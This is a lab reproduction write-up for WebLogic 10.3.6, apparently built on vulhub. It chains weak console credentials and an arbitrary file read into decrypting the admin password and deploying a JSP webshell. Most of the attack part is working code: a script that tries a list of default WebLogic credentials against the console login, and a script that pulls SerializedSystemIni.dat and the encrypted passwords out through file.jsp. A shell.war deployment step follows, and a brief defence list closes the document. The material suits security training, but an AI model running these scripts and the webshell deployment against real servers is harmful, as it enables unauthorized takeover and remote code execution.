WebLogic weak_password vulnerability reproduction
Preface
WebLogic is a Java application server used to develop, integrate, deploy and manage large-scale distributed web applications, network applications and database applications. This article explains the principle behind a common WebLogic weakness, a weak administration-console password (combined here with an arbitrary file read), and walks through the reproduction process.
1. Vulnerability principle
After WebLogic is installed, the password of the administration console is left at a default or weak value. An attacker who guesses it can log in to the console and deploy a webshell.
This environment simulates a realistic WebLogic deployment: the console has a weak password and the frontend has an arbitrary file read vulnerability. The two weaknesses are used together to simulate the penetration of a WebLogic host.
Weblogic version: 10.3.6(11g)
Java version: 1.6
2. Environment setup
Start the vulhub environment:
docker-compose up -d
Visit http://your-ip:7001/console to reach the administration console login page.
3. Reproduction process
1. Log in with a weak password
Enter the weak credentials weblogic / Oracle@123 on the console login page; the login succeeds.
Summary of common WebLogic weak credentials (user:password):
system:password        weblogic:weblogic       admin:security
joe:password           mary:password           system:security
wlcsystem:wlcsystem    weblogic:Oracle@123
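Trying the pairs above by hand is tedious, so here is an added example (not code from the original write-up or from vulhub) that posts each pair to the console login and reports which ones appear to work. It assumes the console uses the standard Java EE form login at /console/j_security_check with the fields j_username, j_password and j_character_encoding, and that a failed login redirects back to the login form while a successful one redirects somewhere else under /console; that classification is a heuristic, so confirm any hit by logging in manually. The host and port default to the values used in this article.

```python
import http.client
import urllib.parse

# Credential pairs taken from the weak-password list in the text.
WEAK_CREDENTIALS = [
    ("system", "password"), ("weblogic", "weblogic"), ("admin", "security"),
    ("joe", "password"), ("mary", "password"), ("system", "security"),
    ("wlcsystem", "wlcsystem"), ("weblogic", "Oracle@123"),
]

LOGIN_FORM = "/console/login/LoginForm.jsp"      # assumed console login page
LOGIN_ACTION = "/console/j_security_check"       # standard form-login target


def classify_login(status, location):
    """Decide what a j_security_check response means.

    Assumption: a failed login redirects back to the login form (or re-renders
    it with 200); a successful login redirects anywhere else in the console.
    """
    if status in (301, 302, 303, 307) and location:
        if "LoginForm.jsp" in location or "/console/login/" in location:
            return "failure"
        return "success"
    if status == 200:
        return "failure"
    return "unknown"


def try_login(host, port, username, password, timeout=10):
    """One attempt: fetch the form to obtain a session cookie, then POST the
    credentials and classify the response without following redirects."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", LOGIN_FORM)
        resp = conn.getresponse()
        resp.read()
        # http.client keeps no cookie jar, so carry the Set-Cookie values
        # (the console session cookie) over to the POST by hand.
        cookies = "; ".join(
            c.split(";", 1)[0] for c in (resp.msg.get_all("Set-Cookie") or [])
        )
        body = urllib.parse.urlencode({
            "j_username": username,
            "j_password": password,
            "j_character_encoding": "UTF-8",
        })
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": cookies,
        }
        conn.request("POST", LOGIN_ACTION, body=body, headers=headers)
        resp = conn.getresponse()
        resp.read()
        return classify_login(resp.status, resp.getheader("Location"))
    finally:
        conn.close()


def check_weak_credentials(host, port=7001, pairs=WEAK_CREDENTIALS):
    """Try every pair once and return the ones that appear to log in."""
    hits = []
    for user, pw in pairs:
        try:
            verdict = try_login(host, port, user, pw)
        except (OSError, http.client.HTTPException) as exc:
            verdict = f"error: {exc}"
        print(f"{user}:{pw} -> {verdict}")
        if verdict == "success":
            hits.append((user, pw))
    return hits


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.241.129"
    print("candidates to confirm manually:", check_weak_credentials(target))
```

Keep the list short: the default WebLogic security realm locks a user after five failed logins for 30 minutes, so a long wordlist locks the account instead of recovering the password. The list above tries at most two passwords per user, which stays under that threshold.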
2. Arbitrary file read
Suppose there is no weak password. How can WebLogic be penetrated then?
This environment also simulates an arbitrary file download vulnerability in the frontend. Requesting http://your-ip:7001/hello/file.jsp?path=/etc/passwd
returns the contents of /etc/passwd, confirming the file read. So how can this be exploited?
WebLogic stores the console password encrypted with AES (older versions used 3DES). Because the encryption is symmetric, anyone who obtains both the ciphertext and the key can decrypt it;
both live under the domain directory (base_domain here): the key material in security/SerializedSystemIni.dat and the encrypted passwords in config/config.xml.
SerializedSystemIni.dat is a binary file, so fetch it with Burp Suite rather than saving it from a browser, which may alter bytes. Request it with Burp intercepting (the path is relative to the domain directory):
192.168.241.129:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
Select the binary response body in Burp (this is the key material), right-click and choose "Copy to file" to save it as a file.
Then request config.xml the same way and locate the encrypted administrator password:
192.168.241.129:7001/hello/file.jsp?path=config/config.xml
config.xml is the global configuration file of base_domain, so it contains a lot of unrelated content. Look for the value of <node-manager-password-encrypted>, which is the encrypted administrator password in this environment. Take care not to copy one of the other *-encrypted values by mistake.
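Pulling both files by hand in Burp works, but it is easy to mangle the binary key or grab the wrong element. The following is an added example (not the page's or vulhub's code) that reads both files through the file.jsp endpoint described above, keeps SerializedSystemIni.dat as raw bytes, and lists every *-encrypted element in config.xml together with its parent element so the node-manager password can be told apart from the other encrypted values. It assumes the /hello/file.jsp?path= endpoint and the domain-relative paths from the text; the embedded config.xml sample is constructed for offline use and its ciphertext strings are placeholders, not real WebLogic output. Decryption itself is left to the tool linked below.

```python
import re
import sys
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of the relevant part of config.xml. The {AES}... strings
# are placeholders so the parser can be exercised offline.
SAMPLE_CONFIG = b"""<?xml version="1.0" encoding="UTF-8"?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain">
  <name>base_domain</name>
  <security-configuration>
    <name>base_domain</name>
    <credential-encrypted>{AES}placeholderCredential==</credential-encrypted>
    <node-manager-username>weblogic</node-manager-username>
    <node-manager-password-encrypted>{AES}placeholderNodeManager==</node-manager-password-encrypted>
  </security-configuration>
</domain>
"""


def fetch_bytes(base_url, path, timeout=10):
    """Read `path` through file.jsp and return the raw response bytes.

    The body is never decoded: SerializedSystemIni.dat is binary and a single
    altered byte makes the key useless.
    """
    query = urllib.parse.urlencode({"path": path})
    url = f"{base_url}/hello/file.jsp?{query}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.split("}", 1)[-1]


def extract_encrypted(config_xml):
    """Return (parent_tag, tag, ciphertext) for every *-encrypted element,
    so <node-manager-password-encrypted> can be picked out deliberately."""
    root = ET.fromstring(config_xml)
    parents = {child: parent for parent in root.iter() for child in parent}
    entries = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag.endswith("-encrypted") and elem.text and elem.text.strip():
            parent = parents.get(elem)
            parent_tag = _local(parent.tag) if parent is not None else ""
            entries.append((parent_tag, tag, elem.text.strip()))
    return entries


def scheme_of(ciphertext):
    """WebLogic prefixes each value with its algorithm: {AES} on 10.3.6 (11g)
    domains, {3DES} on older ones."""
    m = re.match(r"\{(AES|3DES)\}", ciphertext)
    return m.group(1) if m else "unknown"


def looks_like_key_file(data):
    """Sanity check on the downloaded SerializedSystemIni.dat: a small binary
    blob, not an empty body and not an HTML error page."""
    return 0 < len(data) < 1024 and not data.lstrip().startswith(b"<")


def main(base_url):
    key_blob = fetch_bytes(base_url, "security/SerializedSystemIni.dat")
    if not looks_like_key_file(key_blob):
        sys.exit("unexpected content for SerializedSystemIni.dat, check the path")
    with open("SerializedSystemIni.dat", "wb") as fh:  # binary mode, bytes untouched
        fh.write(key_blob)
    config = fetch_bytes(base_url, "config/config.xml")
    for parent_tag, tag, value in extract_encrypted(config):
        print(f"{parent_tag}/{tag} [{scheme_of(value)}]: {value}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "http://192.168.241.129:7001")
```

Run it with the target base URL as the only argument; the saved SerializedSystemIni.dat and the printed <node-manager-password-encrypted> value are exactly the two inputs the decryption tool below expects.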
Then decrypt the password with the following tool:
https://github.com/TideSec/Decrypt_Weblogic_Password
Log in to the console with the recovered password and upload a shell:
Click Deployments first, then Install.
Click the link to upload a file.
Generate a WAR file with the following command and upload it:
jar -cvf shell.war x.jsp    // x.jsp is a JSP one-line webshell
Keep clicking Next until the deployment is complete.
Now request the file directly (the WAR is unpacked after deployment, so the JSP is reachable at the WAR name followed by the JSP path):
192.168.241.129:7001/shell/x.jsp
If the JSP responds, the upload succeeded; connect to it with AntSword.
4. Defense and repair
1. Change the weak console password and restrict login and authorized access to the console (the Config.do page);
2. Add matching signatures to IPS and similar defensive products;
3. Upgrade WebLogic to the latest official version.